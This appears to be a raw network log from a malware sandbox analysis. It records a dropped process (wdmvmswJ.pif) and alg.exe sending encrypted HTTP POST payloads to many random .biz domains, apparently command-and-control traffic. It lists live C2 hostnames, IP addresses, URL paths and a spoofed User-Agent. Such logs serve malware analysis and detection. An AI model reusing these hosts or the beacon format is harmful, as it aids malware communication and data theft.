                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.398248911 CET778OUTData Raw: 5a 3a f4 26 1e 7e b6 78 fe 02 00 00 41 5b f2 a5 be ec b2 05 ca 20 1d fe c5 3b 24 71 c1 68 20 61 71 95 83 61 23 ed cf 95 45 e3 7a 3a 9c 77 fb bd 58 81 b5 56 f7 5d aa cb 93 9f a9 a0 b2 7a b4 be 86 46 85 fb cb 76 5c 79 4c 7b 2f 19 cd 54 8c a8 49 a2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Z:&~xA[ ;$qh aqa#Ez:wXV]zFv\yL{/TI+D/eXAgv53K@w_6nd"T>e-F{*a#-Rl$N[ c&^HE-\oQW]cZ|sR3R|4~bUR}*._U


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        24192.168.2.84973913.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.603535891 CET345OUTPOST /shc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.603569031 CET802OUTData Raw: c2 81 2d 9c 69 68 25 f0 16 03 00 00 c6 45 77 16 99 2d 19 4a 60 5f bd 80 8f f5 c7 f0 46 a0 9f 7c 15 70 cf 27 f2 4b bd 06 88 64 2f 98 65 16 5c 05 c5 40 1e d5 4c 59 54 97 2f 56 a4 a3 c2 ad 4d b0 11 17 84 38 c3 13 0e 35 54 38 b6 73 d0 fc 9a f9 4b 02
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -ih%Ew-J`_F|p'Kd/e\@LYT/VM85T8sK+1x"::9'SiW(VD,?^<g"7':dWK{,}5[|"v1D2}`{ZHUTq$V5sRl&OC]DPl#hN`{DB
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.029498100 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7296ef8c863732edc96552c0f3b26340|173.254.250.82|1730445829|1730445829|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        25192.168.2.84974044.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.070266008 CET353OUTPOST /vhkhfdko HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.070282936 CET802OUTData Raw: c7 4d 66 8b 7c 7a 3c 33 16 03 00 00 a1 57 4c 7f c7 d6 0d ec 5b d2 5f 88 2c ed 91 67 43 fb 59 d1 45 75 4a 8a b0 e9 63 17 76 a7 a8 47 36 2b 87 3a 84 9b 61 23 ac b9 b7 2c 18 20 46 18 78 c8 10 33 4a 3a 62 0a 18 26 19 41 0f 6d 7a 0a d5 8c d0 bb 39 71
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Mf|z<3WL[_,gCYEuJcvG6+:a#, Fx3J:b&Amz9qlUMz'R>HUH67EHt^#w=_}/@V[yE~f?PO<N8yqM)IVO2SYEvwd4@5Nj)\D-Pox>j
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.766902924 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a2ebd1c3513f0d6504e2802380277266|173.254.250.82|1730445830|1730445830|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        26192.168.2.84974118.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.814048052 CET348OUTPOST /xnnwo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.814078093 CET802OUTData Raw: a4 2d 34 67 67 4c e0 8d 16 03 00 00 06 f0 31 71 00 25 62 11 7b a3 2a 75 db b2 ff 70 0e f2 55 ba 95 8b 15 f1 30 1e 42 d5 9b fc a4 fd c8 fa 5c 8d a6 3f 24 ab d5 d9 a5 b1 e4 ac 93 6a b8 8b b3 07 13 c6 df 0d ca 1f ae 1f 0c b6 59 94 30 e7 39 d9 1e 61
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -4ggL1q%b{*upU0B\?$jY09apiI;e'D 1yY^%1i=]=2q3Va!<455;#OsX%uJ4(X1D~/jD-


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        27192.168.2.84974218.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.056709051 CET356OUTPOST /iobhvfdyhggtu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.056787014 CET802OUTData Raw: 1d 16 44 9b 60 62 59 ac 16 03 00 00 0b 68 75 2f d7 7c 91 8c 9d 62 e7 38 d6 f8 52 b5 2f 64 c0 cb 2c 3a 06 5a 16 07 3c 99 5f 35 a6 2a 09 d5 b2 e7 e1 bb 81 cf 7c 25 ae c9 21 c6 5f b3 c0 7f 6f bf 61 17 16 56 ec 4e c3 f6 bb db 88 ce bc b2 5b 4e ed 84
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: D`bYhu/|b8R/d,:Z<_5*|%!_oaVN[N.vfKBh|2~x`)}A ZbR~.7?9Crh#-T8]a$mE5YVv~s`Gi&|Mn=v=,H|GsIT/
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.493208885 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6820ae9761b57032d8f4bfc6a254f9dd|173.254.250.82|1730445832|1730445832|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        28192.168.2.849743172.234.222.143804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.710937977 CET344OUTPOST /mbh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.710978985 CET802OUTData Raw: 42 77 bc 33 29 a5 c4 a2 16 03 00 00 b0 b2 b8 f3 6c 14 7d cd fd 69 f9 e5 ec a9 f1 36 a0 50 7e 5e 06 18 6c 2e 30 e4 6a eb 1c 9c dc 73 c9 b3 b1 5f 4a 09 e8 3a 7d 50 68 8c 63 b1 43 2a 58 66 78 14 34 56 96 2d 57 ec b6 6e 8c c7 b5 bc 7e 00 ea 66 c7 e1
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Bw3)l}i6P~^l.0js_J:}PhcC*Xfx4V-Wn~fTC+"73T6-!=*BM9&hZ&(_UT:hn+&n4nE}m \L!<'\tuMmlPFgm{`jDA'.vg


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        29192.168.2.849744172.234.222.143804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418502092 CET356OUTPOST /sjajebqyfvuqndq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418525934 CET802OUTData Raw: 6e 5f ef 45 9c 3c 60 1c 16 03 00 00 cb 82 a2 1c 65 91 f2 0e c3 ef c1 11 9a 2c 37 da 4a ba 61 8b 75 b7 7b 51 87 f7 67 dd ac 69 da 37 8b c8 7e 69 e0 b7 9d e6 1e 8e 9f 49 89 9a 47 3b df 92 1c 7e b5 6a 5f 57 fe c8 b6 42 3d 4f a5 86 35 88 7f ad 60 c6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n_E<`e,7Jau{Qgi7~iIG;~j_WB=O5`w^/[`TlDz,';gClTMy?gpW(x#fi<w+/gmVs7f9XubB, -[}9,?zat


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        30192.168.2.84974534.246.200.160804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299376965 CET354OUTPOST /dujlogesynfu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299403906 CET802OUTData Raw: 2b e9 10 ab 16 cb bc ea 16 03 00 00 46 2c 85 e2 50 7d b0 9f fd 31 38 f2 80 cf 6f f3 3d a8 c3 ed 12 e6 92 5c 11 55 a1 a2 ed 37 e6 d4 62 02 da 7d cc 8e 81 7e 03 49 57 bc 5b 9e 5b a0 97 1b 31 77 7e 72 ec 95 a6 16 82 aa 28 86 7a f7 3b 8f 27 1d 41 7c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +F,P}18o=\U7b}~IW[[1w~r(z;'A|6A/.&zI6zH|c%3EAVD]VmgyPH:54H^9(K/G"+c,r`i%%"N&}#&iM6D,QW'
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.272229910 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=83edd98c10cf4920d356a0dcfdeb3ee2|173.254.250.82|1730445835|1730445835|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        31192.168.2.84974618.208.156.248804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.316514015 CET356OUTPOST /qautyxiqxdcgavi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.316553116 CET802OUTData Raw: 1e a9 b6 f3 c3 aa 1e ba 16 03 00 00 85 b7 63 cf 8d aa 11 08 13 8b 02 ec ae 24 94 88 d7 c8 fe 4d 33 11 e2 3f e3 8a 7d bc 3a 10 5e 48 f1 6a 99 e7 b4 4a 27 dc 0a 04 33 75 94 89 aa e9 66 b7 ad 60 c4 61 9e d3 52 b4 83 c8 4d 57 32 a2 e8 ca ab 55 fe 2f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: c$M3?}:^HjJ'3uf`aRMW2U/p{F8Fw!X_+P:s9:oJ2wsW>1Kis:8jhJ"1IHL[Lh095"w;+#^=]HhAu:9hU
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.978889942 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b73a4f14b0341030d430cc6b93fcebbe|173.254.250.82|1730445835|1730445835|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        32192.168.2.84974782.112.184.197804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935396910 CET358OUTPOST /vdvikkmvoibst HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935436010 CET778OUTData Raw: 2c 79 83 47 40 b2 b6 52 fe 02 00 00 3f 39 f8 86 f0 55 53 45 98 36 8c 32 ba 9c a2 eb e3 2e fb 0e 68 cb c0 c4 62 26 c1 52 81 40 a6 8e 6b 09 b6 7f 1f c7 a1 bf b0 9b a6 18 7f a8 83 02 c2 db 7a 15 1e e4 55 51 01 ca a8 20 bd 42 0c 1e ba 38 28 0d 74 41
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,yG@R?9USE62.hb&R@kzUQ B8(tAoU31YuoP!P-zoX<T_yy%%m^YE/jGDwljn5t{c$q=xp5%)$Ws2AA99w5];Qm;c2


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        33192.168.2.849748208.100.26.245804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.015181065 CET346OUTPOST /go HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.015197992 CET802OUTData Raw: 61 32 c3 ef fd 90 54 82 16 03 00 00 e7 b8 79 c4 68 f7 38 80 aa fc 7f 7f c7 ba 6d 04 5a 2f 87 a9 bd a4 2d 5d 1c 4b c9 fd 36 4a 21 7d d3 d4 f9 20 b3 ef d3 1b b0 4d 03 e3 ad 0e c6 c1 ce 83 4d 47 e8 66 c2 7c 06 ae fa 82 7c 3c ae ac 35 5b 4c 73 8f 04
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a2Tyh8mZ/-]K6J!} MMGf||<5[Ls}=!{gtd,^9yCn&'y{~5eU9T37%Qqt2D*7{tVLQ@zChxe1WjF%L74-
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.651983023 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.679869890 CET360OUTPOST /bvawourmbxmjmarr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.679891109 CET802OUTData Raw: 3f 2b 94 01 2f f5 a4 c4 16 03 00 00 b2 27 18 ee b2 1a dd 79 e1 ab fc e1 43 af 2d f5 f5 b1 a2 7f 92 8c 19 79 18 de ed bc 77 51 4e 51 52 20 29 03 d6 bc 2d 3f ab 38 ae 73 24 de 3d eb 9c 60 1c 1c 68 54 2e 62 1f f3 43 bb a7 51 0a 7a d6 b1 ad 40 9e b1
